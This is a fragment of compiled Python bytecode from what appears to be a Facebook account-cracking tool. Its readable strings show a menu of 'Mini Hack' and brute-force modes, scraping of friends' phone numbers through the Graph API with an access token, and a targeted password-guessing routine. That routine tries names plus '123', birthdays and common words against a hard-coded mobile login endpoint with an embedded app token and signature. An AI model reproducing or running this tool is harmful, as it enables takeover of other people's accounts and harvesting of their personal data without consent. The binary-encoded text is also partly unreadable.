\x1f\x00f\x02\x00k\n\x00rl\x02\x01\x01\x01d \x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01nI\x00\x04t\x19\x00k\n\x00r\x92\x02\x01\x01\x01d!\x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r\xb4\x02\x01\x01\x01d"\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(#\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s:\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend number phone \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s\x13\x00\x00\x00out/nomer_teman.txtR\x11\x00\x00\x00Rl\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/Rj\x00\x00\x00s\x0e\x00\x00\x00?access_token=Rw\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | R0\x00\x00\x00g-C\x1c\xeb\xe26\x1a?sF\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get number \x1b[1;97m....s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Number \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R \x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00t\x02\x00\x00\x00hpR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00R,\x00\x00\x00Rg\x00\x00\x00R/\x00\x00\x00R\x95\x00\x00\x00R\x80\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x08\x00\x00\x00R4\x00\x00\x00Rk\x00\x00\x00R\'\x00\x00\x00R\x1e\x00\x00\x00R\x98\x00\x00\x00t\x01\x00\x00\x00nR\x10\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x8d\x00\x00\x00@\x03\x00\x00sp\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\n\x01\t\x01\n\x01\x0f\x01\x12\x01\x0f\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s/\x03\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xy\x08\x02t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00}\x01\x00y>\x00t\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00d\x0b\x00|\x03\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x11\x00k\n\x00r\r\x01\x01\x01\x01d\r\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x01\x00Xt\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\x0f\x00\x17|\x00\x00\x17\x83\x01\x00}\x04\x00t\x0e\x00j\x0f\x00|\x04\x00j\x10\x00\x83\x01\x00}\x05\x00t\x13\x00d\x10\x00\x83\x01\x00\x01d\x11\x00d\x12\x00\x14GHt\x02\x00d\x13\x00d\x14\x00\x83\x02\x00}\x06\x00x\xcb\x00|\x05\x00d\x15\x00\x19D]\xbf\x00}\x07\x00t\x0c\x00j\r\x00d\t\x00|\x07\x00d\x16\x00\x19\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x08\x00t\x0e\x00j\x0f\x00|\x08\x00j\x10\x00\x83\x01\x00}\t\x00yt\x00t\x14\x00j\x15\x00|\t\x00d\x17\x00\x19\x83\x01\x00\x01|\x06\x00j\x16\x00|\t\x00d\x17\x00\x19d\x18\x00\x17\x83\x01\x00\x01d\x19\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1a\x00\x17|\t\x00d\x17\x00\x19\x17d\x1b\x00\x17|\t\x00d\x0c\x00\x19\x17d\x18\x00\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1c\x00\x83\x01\x00\x01Wqh\x01\x04t\x11\x00k\n\x00r&\x02\x01\x01\x01qh\x01Xqh\x01W|\x06\x00j\x1c\x00\x83\x00\x00\x01d\x11\x00d\x12\x00\x14GHd\x1d\x00GHd\x1e\x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d\x1f\x00\x83\x01\x00}\n\x00t\x00\x00j\x1d\x00d\x13\x00d \x00|\n\x00\x17\x83\x02\x00\x01d!\x00|\n\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x04\x00k\n\x00r\xb6\x02\x01\x01\x01d"\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00r\xe2\x02\x01\x01\x01d#\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\x08\x03\x01\x01\x01d$\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r*\x03\x01\x01\x01d%\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(&\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID friend \x1b[1;91m: \x1b[1;97ms\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s7\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m R0\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;91m[!] Friend not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x16\x00\x00\x00/friends?access_token=s@\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend number from friend \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x1b\x00\x00\x00out/no_teman_from_teman.txtR\x11\x00\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00Rw\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | g-C\x1c\xeb\xe26\x1a?sF\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get number \x1b[1;97m....s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Number \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x0b\x00\x00\x00hpfromtemanR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x0b\x00\x00\x00R4\x00\x00\x00R\x9c\x00\x00\x00R\x9d\x00\x00\x00R\x9e\x00\x00\x00R\'\x00\x00\x00Rm\x00\x00\x00R\x98\x00\x00\x00R\x13\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x8e\x00\x00\x00y\x03\x00\x00s\x80\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\x1b\x01\x12\x01\n\x01\t\x01\x0f\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xa0\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHt\t\x00\x83\x00\x00\x01d\x00\x00S(\x0e\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00sN\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Mini Hack Facebook(\x1b[1;92mTarget\x1b[1;97m)s?\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Multi Bruteforce FacebooksE\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3.\x1b[1;97m Super Multi Bruteforce FacebooksF\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4.\x1b[1;97m BruteForce(\x1b[1;92mTarget\x1b[1;97m)s3\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m5.\x1b[1;97m Yahoo Checkers*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\n\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\n\x00\x00\x00hack_pilih(\x01\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>Rv\x00\x00\x00\xba\x03\x00\x00s$\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xc2\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\x97\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01n\x81\x00|\x00\x00d\x05\x00k\x02\x00rZ\x00t\x03\x00\x83\x00\x00\x01t\x04\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x06\x00k\x02\x00rp\x00t\x05\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x07\x00k\x02\x00r\x86\x00t\x06\x00\x83\x00\x00\x01n8\x00|\x00\x00d\x08\x00k\x02\x00r\x9c\x00t\x07\x00\x83\x00\x00\x01n"\x00|\x00\x00d\t\x00k\x02\x00r\xb2\x00t\x08\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\n\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong inputR8\x00\x00\x00R9\x00\x00\x00Rs\x00\x00\x00Rt\x00\x00\x00R\x81\x00\x00\x00R:\x00\x00\x00(\t\x00\x00\x00R/\x00\x00\x00R\xaa\x00\x00\x00t\x04\x00\x00\x00minit\x05\x00\x00\x00crackt\x05\x00\x00\x00hasilt\x05\x00\x00\x00supert\x05\x00\x00\x00brutet\n\x00\x00\x00menu_yahooR+\x00\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00hack(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xaa\x00\x00\x00\xce\x03\x00\x00s&\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\x07\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x10\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x05\x07\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00d\t\x00\x14GHyW\x06t\t\x00d\n\x00\x83\x01\x00}\x01\x00t\n\x00d\x0b\x00\x83\x01\x00\x01t\x0b\x00j\x0c\x00d\x0c\x00|\x01\x00\x17d\r\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\r\x00j\x0e\x00|\x02\x00j\x0f\x00\x83\x01\x00}\x03\x00d\x0e\x00|\x03\x00d\x0f\x00\x19\x17GHt\n\x00d\x10\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x11\x00\x83\x01\x00\x01t\n\x00d\x12\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x11\x00\x83\x01\x00\x01d\x08\x00d\t\x00\x14GH|\x03\x00d\x13\x00\x19d\x14\x00\x17}\x04\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x04\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r\x8a\x01d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x04\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01nL\x05d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r\xd7\x01d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x04\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xff\x04|\x03\x00d!\x00\x19}\x07\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x07\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00rS\x02d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x07\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x83\x04d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r\xa0\x02d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x07\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n6\x04|\x03\x00d"\x00\x19d#\x00\x17}\x08\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x08\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r \x03d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x08\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xb6\x03d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00rm\x03d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x08\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01ni\x03|\x03\x00d$\x00\x19}\t\x00|\t\x00j\x14\x00d%\x00d&\x00\x83\x02\x00}\n\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\n\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r\xfb\x03d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\n\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xdb\x02d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00rH\x04d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\n\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x8e\x02|\x03\x00d$\x00\x19}\x0b\x00|\x0b\x00j\x14\x00d%\x00d&\x00\x83\x02\x00}\x0c\x00|\x03\x00d\x13\x00\x19|\x0c\x00\x17}\r\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\r\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r\xe4\x04d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\r\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xf2\x01d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r1\x05d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\r\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xa5\x01d\'\x00}\x0e\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x0e\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00r\xa9\x05d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x0e\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n-\x01d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r\xf6\x05d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x0e\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\xe0\x00d(\x00}\x0f\x00t\x10\x00j\x11\x00d\x15\x00|\x01\x00\x17d\x16\x00\x17|\x0f\x00\x17d\x17\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x12\x00|\x05\x00\x83\x01\x00}\x06\x00d\x18\x00|\x06\x00k\x06\x00rn\x06d\x19\x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x0f\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01nh\x00d\x1e\x00|\x06\x00d\x1f\x00\x19k\x06\x00r\xbb\x06d\x19\x00GHd \x00GHd\x1a\x00|\x03\x00d\x0f\x00\x19\x17GHd\x1b\x00|\x01\x00\x17GHd\x1c\x00|\x0e\x00\x17GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x1b\x00d)\x00GHd*\x00GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01Wn\'\x00\x04t\x15\x00k\n\x00r\x00\x07\x01\x01\x01d+\x00GHt\t\x00d\x1d\x00\x83\x01\x00\x01t\x13\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(,\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00se\x00\x00\x00\x1b[1;97m[\x1b[1;91mINFO\x1b[1;97m] \x1b[1;91mThe target account must be friends\n with your account first!i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s,\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTarget ID \x1b[1;91m:\x1b[1;97m s,\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...s\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s"\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : R0\x00\x00\x00s"\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mCheck \x1b[1;97m...i\x02\x00\x00\x00s*\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mOpen password \x1b[1;97m...t\n\x00\x00\x00first_namet\x05\x00\x00\x0012345s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6RQ\x00\x00\x00s\x17\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFounds4\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : s&\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : s&\x00\x00\x00\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : s\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x10\x00\x00\x00www.facebook.comt\t\x00\x00\x00error_msgs$\x00\x00\x00\x1b[1;91m[!] \x1b[1;93mAccount Checkpointt\x06\x00\x00\x00sayangt\t\x00\x00\x00last_namet\x03\x00\x00\x00123Ry\x00\x00\x00t\x01\x00\x00\x00/R\n\x00\x00\x00t\t\x00\x00\x00kontol123t\t\x00\x00\x00sayang123s7\x00\x00\x00\x1b[1;91m[!] Sorry, failed to open the target password :(s\x1e\x00\x00\x00\x1b[1;91m[!] try it another way.s\x1b\x00\x00\x00\x1b[1;91m[!] Terget not found(\x16\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R 